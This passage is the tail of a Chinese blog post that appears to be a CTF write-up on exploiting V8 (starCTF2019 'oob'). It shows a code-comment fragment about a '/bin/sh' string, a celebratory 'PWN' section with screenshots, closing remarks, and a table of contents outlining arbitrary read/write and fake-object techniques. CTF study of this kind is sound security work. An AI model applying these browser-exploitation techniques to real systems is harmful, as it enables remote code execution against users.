class="comment">//16进制内容为/bin/sh</span></span><br></pre></td></tr></table></figure>

<h3 id="PWN！！！"><a href="#PWN！！！" class="headerlink" title="PWN！！！"></a>PWN！！！</h3><p>虽然很菜，但是还是pwn了，开心：</p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200602160446894.png" alt="image-20200602160446894"></p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200602160512211.png" alt="image-20200602160512211"></p>
<h2 id="写在最后"><a href="#写在最后" class="headerlink" title="写在最后"></a>写在最后</h2><p>如有错误欢迎指正：<a href="mailto:sofr@foxmail.com">sofr@foxmail.com</a></p>
	  
	</div>

	<div>
  	<center>
	<div class="pagination">

    
    
    <a href="/2020/06/06/数字经济/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2020/05/11/de1-wp/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>

    </center>
	</div>
	
	<!-- comment -->
	
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>


	</div> <!-- col-md-9/col-md-12 -->
		
	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2020-06-01 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/pwn/">pwn<span>8</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/browser/">browser<span>3</span></a></li> <li><a href="/tags/v8/">v8<span>3</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#前言"><span class="toc-article-text">前言</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#V8的搭建"><span class="toc-article-text">V8的搭建</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#V8调试"><span class="toc-article-text">V8调试</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#基础知识学习"><span class="toc-article-text">基础知识学习</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#数组"><span class="toc-article-text">数组</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#JSArray和FixedArray"><span class="toc-article-text">JSArray和FixedArray</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#数组中元素存放形式"><span class="toc-article-text">数组中元素存放形式</span></a></li></ol></li></ol></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#starCTF2019-oob"><span class="toc-article-text">starCTF2019-oob</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#分析"><span class="toc-article-text">分析</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#思路"><span class="toc-article-text">思路</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#任意对象地址读"><span class="toc-article-text">任意对象地址读</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#任意对象构造"><span class="toc-article-text">任意对象构造</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#构造fake-object"><span class="toc-article-text">构造fake object</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#任意地址读写"><span class="toc-article-text">任意地址读写</span></a></li></ol></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#PWN！！！"><span class="toc-article-text">PWN！！！</span></a></li></ol></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#写在最后"><span class="toc-article-text">写在最后</span></a></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

	</div>
		

</div><!-- row -->



	</div>
  </div>
  <div class="container-narrow">
  <footer>  </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
